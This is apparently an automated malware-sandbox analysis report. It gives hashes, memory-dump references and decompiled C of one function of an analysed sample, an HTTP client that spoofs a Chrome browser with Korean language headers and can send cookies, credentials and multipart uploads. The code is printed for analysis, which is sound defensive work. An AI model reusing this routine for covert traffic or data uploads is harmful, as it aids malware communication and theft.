                                                                                                                                                                          • Opcode Fuzzy Hash: 8cf1fe81f6f864816b257ae7aa1445d5809d52eafb48723ac30665233529113e
                                                                                                                                                                          • Instruction Fuzzy Hash: DDC0127680020CBBCB00DBE0CC8C88AB7ACEA08211B200185F909C3200DA32AA088AA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00445630, Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6644be1cfe33cbe183cb6949c1b90dbc9d742968ec06f111115033d9a9c31fb9
                                                                                                                                                                          • Instruction ID: 3cd941ba13157734125547d1fc372db87dfbbb2a6798ae1d20b19e846ec71d3e
                                                                                                                                                                          • Opcode Fuzzy Hash: 6644be1cfe33cbe183cb6949c1b90dbc9d742968ec06f111115033d9a9c31fb9
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BA1933A704B44DFEB16CE99C5D076577A2EB8EB64F34007AE907C7712DABAAC00D644
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 10021AF0, Relevance: 100.4, APIs: 42, Strings: 15, Instructions: 641timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                          			E10021AF0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, signed int _a24, long _a28, long _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v40;
				long _v44;
				WCHAR* _v48;
				long _v52;
				short _v54;
				short _v58;
				short _v62;
				short _v66;
				short _v70;
				char _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				long _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _v140;
				char _v28334;
				char _v28336;
				intOrPtr _v28340;
				intOrPtr _v28344;
				char _v28862;
				short _v28864;
				long _v28868;
				long _v28872;
				long _v28876;
				intOrPtr _v28880;
				intOrPtr _v28884;
				char _v28912;
				char _v28940;
				long _v28944;
				intOrPtr _v28948;
				intOrPtr _v28952;
				intOrPtr _v28956;
				long _v28960;
				intOrPtr _v28964;
				intOrPtr _v28968;
				intOrPtr _v28972;
				intOrPtr _v28976;
				void* __ebp;
				long _t263;
				intOrPtr _t267;
				long _t268;
				signed int* _t276;
				long _t277;
				long _t279;
				long _t288;
				long _t292;
				long _t295;
				long _t298;
				long _t311;
				intOrPtr _t330;
				intOrPtr _t470;
				void* _t471;
				void* _t473;
				void* _t479;

				_t469 = __esi;
				_t468 = __edi;
				_t357 = __ebx;
				_push(0xffffffff);
				_push(E10022BD7);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t470;
				E10018AA0(0x7120);
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				_v28 = 0;
				_v20 = 0x50;
				_v40 = 0;
				_t263 = E100211B0(__ebx, __edi, __esi, _a16,  &_v24,  &_v36,  &_v28,  &_v20,  &_v40);
				_t471 = _t470 + 0x18;
				_v32 = _t263;
				if(_v32 == 0) {
					L66:
					 *[fs:0x0] = _v16;
					return _v32;
				} else {
					_v32 = 0;
					_v48 = "----WebKitFormBoundaryovEAlxca0DiIz7tl";
					_v76 = E1001A370(__ebx, __edi, __esi, _v28);
					_t267 = E1001A370(__ebx, __edi, __esi, _v40);
					_t473 = _t471 + 8;
					_v84 = _t267;
					_v72 = 0;
					_v70 = 0;
					_v66 = 0;
					_v62 = 0;
					_v58 = 0;
					_v54 = 0;
					_t268 = _a20;
					_v28944 = _t268;
					if(_v28944 == 1) {
						_t268 = E1000E743(0,  &_v72, 0xa, L"GET");
						_t473 = _t473 + 0xc;
					} else {
						if(_v28944 > 1) {
							if(_v28944 <= 3) {
								_t268 = E1000E743( &_v72,  &_v72, 0xa, L"POST");
								_t473 = _t473 + 0xc;
							}
						}
					}
					_v88 = 0;
					_v44 = 0;
					_v80 = 0;
					_v52 = 0;
					__imp__WinHttpOpen(L"A WinHTTP Example Program/1.0", 0, 0, 0, 0); // executed
					_v44 = _t268;
					if(_v44 == 0) {
						L59:
						__eflags = _v52;
						if(_v52 != 0) {
							__imp__WinHttpCloseHandle(_v52);
						}
						__eflags = _v80;
						if(_v80 != 0) {
							__imp__WinHttpCloseHandle(_v80);
						}
						__eflags = _v44;
						if(__eflags != 0) {
							__imp__WinHttpCloseHandle(_v44);
						}
						_push(_v84);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v76);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v36);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v28);
						E1000CA30(_t357, _t468, _t469, __eflags);
						_push(_v40);
						E1000CA30(_t357, _t468, _t469, __eflags);
						goto L66;
					}
					_t504 = _a4;
					if(_a4 != 0) {
						_v100 = E1001A370(_t357, _t468, _t469, _a4);
						_v112 = 3;
						_v108 = _v100;
						_v104 = 0x10024f9c;
						__imp__WinHttpSetOption(_v44, 0x26,  &_v112, 0xc);
						_push(_v100);
						E1000CA30(_t357, _t468, _t469, _t504);
						_t473 = _t473 + 8;
					}
					asm("sbb edx, edx");
					_v92 =  ~_a24 & 0x00000002;
					_t276 =  &_v92;
					__imp__WinHttpSetOption(_v44, 0x58, _t276, 4);
					_v96 = _t276;
					_t277 = _v76;
					__imp__WinHttpConnect(_v44, _t277, _v20, 0);
					_v80 = _t277;
					if(_v80 == 0) {
						goto L59;
					}
					_v116 = 0x100;
					if(_v24 != 0) {
						_v116 = _v116 | 0x00800000;
					}
					_t279 = _v80;
					__imp__WinHttpOpenRequest(_t279,  &_v72, _v84, L"HTTP/1.1", 0, 0, _v116); // executed
					_v52 = _t279;
					if(_v52 == 0) {
						goto L59;
					} else {
						if(_a8 != 0) {
							_t510 = _a12;
							if(_a12 != 0) {
								_v132 = E1001A370(_t357, _t468, _t469, _a8);
								_v136 = E1001A370(_t357, _t468, _t469, _a12);
								__imp__WinHttpSetCredentials(_v52, 1, 1, _v132, _v136, 0);
								_push(_v132);
								E1000CA30(_t357, _t468, _t469, _t510);
								_push(_v136);
								E1000CA30(_t357, _t468, _t469, _t510);
								_t473 = _t473 + 0x10;
							}
						}
						_v120 = 4;
						__imp__WinHttpQueryOption(_v52, 0x1f,  &_v116,  &_v120);
						_v116 = _v116 | 0x00000100;
						_v116 = _v116 | 0x00002000;
						_v116 = _v116 | 0x00001000;
						__imp__WinHttpSetOption(_v52, 0x1f,  &_v116, 4);
						__imp__WinHttpAddRequestHeaders(_v52, L"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7", 0xffffffff, 0xa0000000);
						__imp__WinHttpAddRequestHeaders(_v52, L"upgrade-insecure-requests: 1", 0xffffffff, 0xa0000000);
						if(_a60 == 0) {
							L22:
							__eflags = _a28;
							if(_a28 != 0) {
								_v28340 = E1001A370(_t357, _t468, _t469, _a28);
								_v28336 = 0;
								E1000CF20(_t468,  &_v28334, 0, 0x6e1e);
								E1000E743( &_v28336,  &_v28336, 0x3710, L"Cookie: ");
								E1000E6C9( &_v28336, 0x3710, _v28340);
								__imp__WinHttpAddRequestHeaders(_v52,  &_v28336, 0xffffffff, 0xa0000000);
								_push(_v28340);
								E1000CA30(_t357, _t468, _t469, __eflags);
								_t473 = _t473 + 0x2c;
							}
							_v28948 = _a20;
							__eflags = _v28948 - 2;
							if(_v28948 == 2) {
								__imp__WinHttpAddRequestHeaders(_v52, L"Content-Type: application/x-www-form-urlencoded", 0xffffffff, 0xa0000000);
							} else {
								__eflags = _v28948 - 3;
								if(_v28948 == 3) {
									_v28864 = 0;
									E1000CF20(_t468,  &_v28862, 0, 0x206);
									_v28344 = E1001A370(_t357, _t468, _t469, _v48);
									wsprintfW( &_v28864, L"Content-Type: multipart/form-data; boundary=%ws", _v28344);
									__imp__WinHttpAddRequestHeaders(_v52,  &_v28864, 0xffffffff, 0xa0000000);
									_push(_v28344);
									E1000CA30(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x20;
								}
							}
							__imp__WinHttpSetTimeouts(_v52, 0xc350, 0xc350, 0xc350, 0xc350);
							_v128 = 0;
							_v124 = 0;
							__eflags = _a20 - 3;
							if(_a20 == 3) {
								_v124 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_v128 = L1000CE56(_t357, _v48, _t468, _t469, _v124);
								E1000CF20(_t468, _v128, 0, _v124);
								_t330 = E10021460(_t357, _t468, _v48, _a32, _a36, _a40, _a44, _a48, _a52, _a56,  &_v128);
								_t473 = _t473 + 0x58;
								_v124 = _t330;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28952 = _a36;
							} else {
								_v28952 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28956 = _a36;
							} else {
								_v28956 = _v124;
							}
							__eflags = _a20 - 3;
							if(_a20 != 3) {
								_v28960 = _a32;
							} else {
								_v28960 = _v128;
							}
							_t288 = _v52;
							__imp__WinHttpSendRequest(_t288, 0, 0, _v28960, _v28956, _v28952, 0); // executed
							_v88 = _t288;
							__eflags = _v88;
							if(_v88 == 0) {
								L57:
								__eflags = _v128;
								if(__eflags != 0) {
									_push(_v128);
									E1000CA30(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 4;
								}
								goto L59;
							} else {
								__imp__WinHttpReceiveResponse(_v52, 0); // executed
								_v88 = _t288;
								__eflags = _v88;
								if(_v88 == 0) {
									goto L57;
								}
								_v28868 = 0;
								__imp__WinHttpQueryHeaders(_v52, 0x16, 0, 0,  &_v28868, 0);
								_t292 = GetLastError();
								__eflags = _t292 - 0x7a;
								if(_t292 == 0x7a) {
									_v28884 = L1000CE56(_t357,  &_v28868, _t468, _t469, _v28868 + 2);
									__eflags = _v28868 + 2;
									E1000CF20(_t468, _v28884, 0, _v28868 + 2);
									_t311 = _v52;
									__imp__WinHttpQueryHeaders(_t311, 0x16, 0, _v28884,  &_v28868, 0);
									_v88 = _t311;
									_v28880 = E1001A400(_t357, _t468, _t469, _v28884);
									_v28964 = E10001160( &_v28912, __eflags, _v28880);
									_v28968 = _v28964;
									_v8 = 0;
									E10001A70(_a64, _v28968);
									_v8 = 0xffffffff;
									E100011A0( &_v28912);
									_push(_v28880);
									E1000CA30(_t357, _t468, _t469, __eflags);
									_push(_v28884);
									_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
									_t473 = _t473 + 0x1c;
								}
								_v28876 = 0;
								_v28872 = 0;
								__eflags = _v88;
								if(_v88 == 0) {
									L56:
									_v32 = _v88;
									goto L57;
								} else {
									while(1) {
										_v28868 = 0;
										_t437 = _v52;
										__imp__WinHttpQueryDataAvailable(_v52,  &_v28868);
										__eflags = _t292;
										if(__eflags == 0) {
											break;
										}
										__eflags = _v28868;
										if(_v28868 != 0) {
											_t295 = L1000CE56(_t357, _t437, _t468, _t469, _v28868 + 1);
											_t479 = _t473 + 4;
											_v28876 = _t295;
											__eflags = _v28876;
											if(__eflags != 0) {
												E1000CF20(_t468, _v28876, 0, _v28868 + 1);
												_t473 = _t479 + 0xc;
												_t439 = _v28876;
												_t298 = _v52;
												__imp__WinHttpReadData(_t298, _v28876, _v28868,  &_v28872);
												__eflags = _t298;
												if(__eflags == 0) {
													_push(GetLastError());
													_push("WinHttpQueryDataAvailable failed. Error = %d\n");
													E1000E604(_t357, _t439, _t468, _t469, __eflags);
													_t473 = _t473 + 8;
												}
												__eflags = _v28872;
												if(__eflags != 0) {
													_v28972 = E10001160( &_v28940, __eflags, _v28876);
													_v28976 = _v28972;
													_v8 = 1;
													E10001A70(_a68, _v28976);
													_v8 = 0xffffffff;
													E100011A0( &_v28940);
													_push(_v28876);
													_t292 = E1000CA30(_t357, _t468, _t469, __eflags);
													_t473 = _t473 + 4;
													__eflags = _v28868;
													if(_v28868 > 0) {
														continue;
													}
												} else {
												}
												goto L56;
											}
											_push("Out of memory.\n");
											E1000E604(_t357, _t437, _t468, _t469, __eflags);
											_t473 = _t479 + 4;
											goto L56;
										}
										goto L56;
									}
									_push(GetLastError());
									_push("WinHttpQueryDataAvailable failed. Error = %d\n");
									E1000E604(_t357, _t437, _t468, _t469, __eflags);
									_t473 = _t473 + 8;
									goto L56;
								}
							}
						} else {
							_v140 = 0;
							while( *((intOrPtr*)(_a60 + _v140 * 4)) != 0) {
								__imp__WinHttpAddRequestHeaders(_v52,  *((intOrPtr*)(_a60 + _v140 * 4)), 0xffffffff, 0xa0000000);
								_v140 = _v140 + 1;
							}
							goto L22;
						}
					}
				}
			}












































































                                                                                                                                                                          0x10021af0
                                                                                                                                                                          0x10021af0
                                                                                                                                                                          0x10021af0
                                                                                                                                                                          0x10021af3
                                                                                                                                                                          0x10021af5
                                                                                                                                                                          0x10021b00
                                                                                                                                                                          0x10021b01
                                                                                                                                                                          0x10021b0d
                                                                                                                                                                          0x10021b12
                                                                                                                                                                          0x10021b19
                                                                                                                                                                          0x10021b20
                                                                                                                                                                          0x10021b27
                                                                                                                                                                          0x10021b2e
                                                                                                                                                                          0x10021b35
                                                                                                                                                                          0x10021b54
                                                                                                                                                                          0x10021b59
                                                                                                                                                                          0x10021b5c
                                                                                                                                                                          0x10021b63
                                                                                                                                                                          0x100223d3
                                                                                                                                                                          0x100223d9
                                                                                                                                                                          0x100223e3
                                                                                                                                                                          0x10021b69
                                                                                                                                                                          0x10021b69
                                                                                                                                                                          0x10021b70
                                                                                                                                                                          0x10021b83
                                                                                                                                                                          0x10021b8a
                                                                                                                                                                          0x10021b8f
                                                                                                                                                                          0x10021b92
                                                                                                                                                                          0x10021b95
                                                                                                                                                                          0x10021b9d
                                                                                                                                                                          0x10021ba0
                                                                                                                                                                          0x10021ba3
                                                                                                                                                                          0x10021ba6
                                                                                                                                                                          0x10021ba9
                                                                                                                                                                          0x10021bad
                                                                                                                                                                          0x10021bb0
                                                                                                                                                                          0x10021bbd
                                                                                                                                                                          0x10021bde
                                                                                                                                                                          0x10021be3
                                                                                                                                                                          0x10021bbf
                                                                                                                                                                          0x10021bc6
                                                                                                                                                                          0x10021bcf
                                                                                                                                                                          0x10021bf3
                                                                                                                                                                          0x10021bf8
                                                                                                                                                                          0x10021bf8
                                                                                                                                                                          0x10021bcf
                                                                                                                                                                          0x10021bc6
                                                                                                                                                                          0x10021bfb
                                                                                                                                                                          0x10021c02
                                                                                                                                                                          0x10021c09
                                                                                                                                                                          0x10021c10
                                                                                                                                                                          0x10021c24
                                                                                                                                                                          0x10021c2a
                                                                                                                                                                          0x10021c31
                                                                                                                                                                          0x10022367
                                                                                                                                                                          0x10022367
                                                                                                                                                                          0x1002236b
                                                                                                                                                                          0x10022371
                                                                                                                                                                          0x10022371
                                                                                                                                                                          0x10022377
                                                                                                                                                                          0x1002237b
                                                                                                                                                                          0x10022381
                                                                                                                                                                          0x10022381
                                                                                                                                                                          0x10022387
                                                                                                                                                                          0x1002238b
                                                                                                                                                                          0x10022391
                                                                                                                                                                          0x10022391
                                                                                                                                                                          0x1002239a
                                                                                                                                                                          0x1002239b
                                                                                                                                                                          0x100223a6
                                                                                                                                                                          0x100223a7
                                                                                                                                                                          0x100223b2
                                                                                                                                                                          0x100223b3
                                                                                                                                                                          0x100223be
                                                                                                                                                                          0x100223bf
                                                                                                                                                                          0x100223ca
                                                                                                                                                                          0x100223cb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100223d0
                                                                                                                                                                          0x10021c37
                                                                                                                                                                          0x10021c3b
                                                                                                                                                                          0x10021c49
                                                                                                                                                                          0x10021c4c
                                                                                                                                                                          0x10021c56
                                                                                                                                                                          0x10021c59
                                                                                                                                                                          0x10021c6c
                                                                                                                                                                          0x10021c75
                                                                                                                                                                          0x10021c76
                                                                                                                                                                          0x10021c7b
                                                                                                                                                                          0x10021c7b
                                                                                                                                                                          0x10021c83
                                                                                                                                                                          0x10021c88
                                                                                                                                                                          0x10021c8d
                                                                                                                                                                          0x10021c97
                                                                                                                                                                          0x10021c9d
                                                                                                                                                                          0x10021ca7
                                                                                                                                                                          0x10021caf
                                                                                                                                                                          0x10021cb5
                                                                                                                                                                          0x10021cbc
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10021cc2
                                                                                                                                                                          0x10021ccd
                                                                                                                                                                          0x10021cd8
                                                                                                                                                                          0x10021cd8
                                                                                                                                                                          0x10021cf0
                                                                                                                                                                          0x10021cf4
                                                                                                                                                                          0x10021cfa
                                                                                                                                                                          0x10021d01
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10021d07
                                                                                                                                                                          0x10021d0b
                                                                                                                                                                          0x10021d0d
                                                                                                                                                                          0x10021d11
                                                                                                                                                                          0x10021d1f
                                                                                                                                                                          0x10021d2e
                                                                                                                                                                          0x10021d49
                                                                                                                                                                          0x10021d52
                                                                                                                                                                          0x10021d53
                                                                                                                                                                          0x10021d61
                                                                                                                                                                          0x10021d62
                                                                                                                                                                          0x10021d67
                                                                                                                                                                          0x10021d67
                                                                                                                                                                          0x10021d11
                                                                                                                                                                          0x10021d6a
                                                                                                                                                                          0x10021d7f
                                                                                                                                                                          0x10021d8e
                                                                                                                                                                          0x10021d99
                                                                                                                                                                          0x10021da5
                                                                                                                                                                          0x10021db4
                                                                                                                                                                          0x10021dca
                                                                                                                                                                          0x10021de0
                                                                                                                                                                          0x10021df6
                                                                                                                                                                          0x10021e0c
                                                                                                                                                                          0x10021e16
                                                                                                                                                                          0x10021e62
                                                                                                                                                                          0x10021e62
                                                                                                                                                                          0x10021e66
                                                                                                                                                                          0x10021e78
                                                                                                                                                                          0x10021e7e
                                                                                                                                                                          0x10021e95
                                                                                                                                                                          0x10021eae
                                                                                                                                                                          0x10021ec9
                                                                                                                                                                          0x10021ee3
                                                                                                                                                                          0x10021eef
                                                                                                                                                                          0x10021ef0
                                                                                                                                                                          0x10021ef5
                                                                                                                                                                          0x10021ef5
                                                                                                                                                                          0x10021efb
                                                                                                                                                                          0x10021f01
                                                                                                                                                                          0x10021f08
                                                                                                                                                                          0x10021f28
                                                                                                                                                                          0x10021f0a
                                                                                                                                                                          0x10021f0a
                                                                                                                                                                          0x10021f11
                                                                                                                                                                          0x10021f30
                                                                                                                                                                          0x10021f47
                                                                                                                                                                          0x10021f5b
                                                                                                                                                                          0x10021f74
                                                                                                                                                                          0x10021f8f
                                                                                                                                                                          0x10021f9b
                                                                                                                                                                          0x10021f9c
                                                                                                                                                                          0x10021fa1
                                                                                                                                                                          0x10021fa1
                                                                                                                                                                          0x10021f11
                                                                                                                                                                          0x10021fbc
                                                                                                                                                                          0x10021fc2
                                                                                                                                                                          0x10021fc9
                                                                                                                                                                          0x10021fd0
                                                                                                                                                                          0x10021fd4
                                                                                                                                                                          0x10022002
                                                                                                                                                                          0x10022011
                                                                                                                                                                          0x1002201e
                                                                                                                                                                          0x1002204a
                                                                                                                                                                          0x1002204f
                                                                                                                                                                          0x10022052
                                                                                                                                                                          0x10022052
                                                                                                                                                                          0x10022055
                                                                                                                                                                          0x10022059
                                                                                                                                                                          0x10022069
                                                                                                                                                                          0x1002205b
                                                                                                                                                                          0x1002205e
                                                                                                                                                                          0x1002205e
                                                                                                                                                                          0x1002206f
                                                                                                                                                                          0x10022073
                                                                                                                                                                          0x10022083
                                                                                                                                                                          0x10022075
                                                                                                                                                                          0x10022078
                                                                                                                                                                          0x10022078
                                                                                                                                                                          0x10022089
                                                                                                                                                                          0x1002208d
                                                                                                                                                                          0x1002209d
                                                                                                                                                                          0x1002208f
                                                                                                                                                                          0x10022092
                                                                                                                                                                          0x10022092
                                                                                                                                                                          0x100220be
                                                                                                                                                                          0x100220c2
                                                                                                                                                                          0x100220c8
                                                                                                                                                                          0x100220cb
                                                                                                                                                                          0x100220cf
                                                                                                                                                                          0x10022355
                                                                                                                                                                          0x10022355
                                                                                                                                                                          0x10022359
                                                                                                                                                                          0x1002235e
                                                                                                                                                                          0x1002235f
                                                                                                                                                                          0x10022364
                                                                                                                                                                          0x10022364
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100220d5
                                                                                                                                                                          0x100220db
                                                                                                                                                                          0x100220e1
                                                                                                                                                                          0x100220e4
                                                                                                                                                                          0x100220e8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100220ee
                                                                                                                                                                          0x1002210b
                                                                                                                                                                          0x10022111
                                                                                                                                                                          0x10022117
                                                                                                                                                                          0x1002211a
                                                                                                                                                                          0x10022132
                                                                                                                                                                          0x1002213e
                                                                                                                                                                          0x1002214b
                                                                                                                                                                          0x10022167
                                                                                                                                                                          0x1002216b
                                                                                                                                                                          0x10022171
                                                                                                                                                                          0x10022183
                                                                                                                                                                          0x1002219b
                                                                                                                                                                          0x100221a7
                                                                                                                                                                          0x100221ad
                                                                                                                                                                          0x100221be
                                                                                                                                                                          0x100221c3
                                                                                                                                                                          0x100221d0
                                                                                                                                                                          0x100221db
                                                                                                                                                                          0x100221dc
                                                                                                                                                                          0x100221ea
                                                                                                                                                                          0x100221eb
                                                                                                                                                                          0x100221f0
                                                                                                                                                                          0x100221f0
                                                                                                                                                                          0x100221f3
                                                                                                                                                                          0x100221fd
                                                                                                                                                                          0x10022207
                                                                                                                                                                          0x1002220b
                                                                                                                                                                          0x1002234f
                                                                                                                                                                          0x10022352
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10022211
                                                                                                                                                                          0x10022211
                                                                                                                                                                          0x10022211
                                                                                                                                                                          0x10022222
                                                                                                                                                                          0x10022226
                                                                                                                                                                          0x1002222c
                                                                                                                                                                          0x1002222e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10022249
                                                                                                                                                                          0x10022250
                                                                                                                                                                          0x10022261
                                                                                                                                                                          0x10022266
                                                                                                                                                                          0x10022269
                                                                                                                                                                          0x1002226f
                                                                                                                                                                          0x10022276
                                                                                                                                                                          0x1002229d
                                                                                                                                                                          0x100222a2
                                                                                                                                                                          0x100222b3
                                                                                                                                                                          0x100222ba
                                                                                                                                                                          0x100222be
                                                                                                                                                                          0x100222c4
                                                                                                                                                                          0x100222c6
                                                                                                                                                                          0x100222ce
                                                                                                                                                                          0x100222cf
                                                                                                                                                                          0x100222d4
                                                                                                                                                                          0x100222d9
                                                                                                                                                                          0x100222d9
                                                                                                                                                                          0x100222dc
                                                                                                                                                                          0x100222e3
                                                                                                                                                                          0x100222f9
                                                                                                                                                                          0x10022305
                                                                                                                                                                          0x1002230b
                                                                                                                                                                          0x1002231c
                                                                                                                                                                          0x10022321
                                                                                                                                                                          0x1002232e
                                                                                                                                                                          0x10022339
                                                                                                                                                                          0x1002233a
                                                                                                                                                                          0x1002233f
                                                                                                                                                                          0x10022342
                                                                                                                                                                          0x10022349
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100222e5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x100222e3
                                                                                                                                                                          0x10022278
                                                                                                                                                                          0x1002227d
                                                                                                                                                                          0x10022282
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10022282
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10022252
                                                                                                                                                                          0x10022236
                                                                                                                                                                          0x10022237
                                                                                                                                                                          0x1002223c
                                                                                                                                                                          0x10022241
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10022241
                                                                                                                                                                          0x1002220b
                                                                                                                                                                          0x10021e18
                                                                                                                                                                          0x10021e18
                                                                                                                                                                          0x10021e33
                                                                                                                                                                          0x10021e5a
                                                                                                                                                                          0x10021e2d
                                                                                                                                                                          0x10021e2d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x10021e33
                                                                                                                                                                          0x10021e16
                                                                                                                                                                          0x10021d01

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 100211B0: _memset.LIBCMT ref: 100212CB
                                                                                                                                                                            • Part of subcall function 100211B0: _strlen.LIBCMT ref: 1002130A
                                                                                                                                                                            • Part of subcall function 1001A370: _strlen.LIBCMT ref: 1001A381
                                                                                                                                                                            • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
                                                                                                                                                                            • Part of subcall function 1001A370: _memset.LIBCMT ref: 1001A3C6
                                                                                                                                                                            • Part of subcall function 1001A370: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2
                                                                                                                                                                          • _wcscpy_s.LIBCMT ref: 10021BDE
                                                                                                                                                                          • _wcscpy_s.LIBCMT ref: 10021BF3
                                                                                                                                                                          • WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021C24
                                                                                                                                                                          • WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021C6C
                                                                                                                                                                          • WinHttpSetOption.WINHTTP(00000000,00000058,?,00000004), ref: 10021C97
                                                                                                                                                                          • WinHttpConnect.WINHTTP(00000000,?,00000050,00000000), ref: 10021CAF
                                                                                                                                                                          • WinHttpOpenRequest.WINHTTP(00000000,?,?,HTTP/1.1,00000000,00000000,00000100), ref: 10021CF4
                                                                                                                                                                          • WinHttpSetCredentials.WINHTTP(00000000,00000001,00000001,?,?,00000000), ref: 10021D49
                                                                                                                                                                          • WinHttpQueryOption.WINHTTP(00000000,0000001F,00000100,?), ref: 10021D7F
                                                                                                                                                                          • WinHttpSetOption.WINHTTP(00000000,0000001F,00000100,00000004), ref: 10021DB4
                                                                                                                                                                          • WinHttpAddRequestHeaders.WINHTTP(00000000,User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,000000FF,A0000000), ref: 10021DCA
                                                                                                                                                                          • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3,000000FF,A0000000), ref: 10021DE0
                                                                                                                                                                          • WinHttpAddRequestHeaders.WINHTTP(00000000,Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7,000000FF,A0000000), ref: 10021DF6
                                                                                                                                                                          • WinHttpAddRequestHeaders.WINHTTP(00000000,upgrade-insecure-requests: 1,000000FF,A0000000), ref: 10021E0C
                                                                                                                                                                          • WinHttpAddRequestHeaders.WINHTTP(00000000,00000000,000000FF,A0000000), ref: 10021E5A
                                                                                                                                                                          • _memset.LIBCMT ref: 10021E95
                                                                                                                                                                          • _wcscpy_s.LIBCMT ref: 10021EAE
                                                                                                                                                                          • _wcscat_s.LIBCMT ref: 10021EC9
                                                                                                                                                                          • WinHttpAddRequestHeaders.WINHTTP(00000000,?,000000FF,A0000000), ref: 10021EE3
                                                                                                                                                                          • WinHttpAddRequestHeaders.WINHTTP(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,A0000000), ref: 10021F28
                                                                                                                                                                            • Part of subcall function 10021460: _memset.LIBCMT ref: 100214F6
                                                                                                                                                                            • Part of subcall function 10021460: _memset.LIBCMT ref: 10021513
                                                                                                                                                                            • Part of subcall function 10021460: _memset.LIBCMT ref: 10021530
                                                                                                                                                                            • Part of subcall function 10021460: _sprintf.LIBCMT ref: 10021552
                                                                                                                                                                            • Part of subcall function 10021460: _sprintf.LIBCMT ref: 1002156C
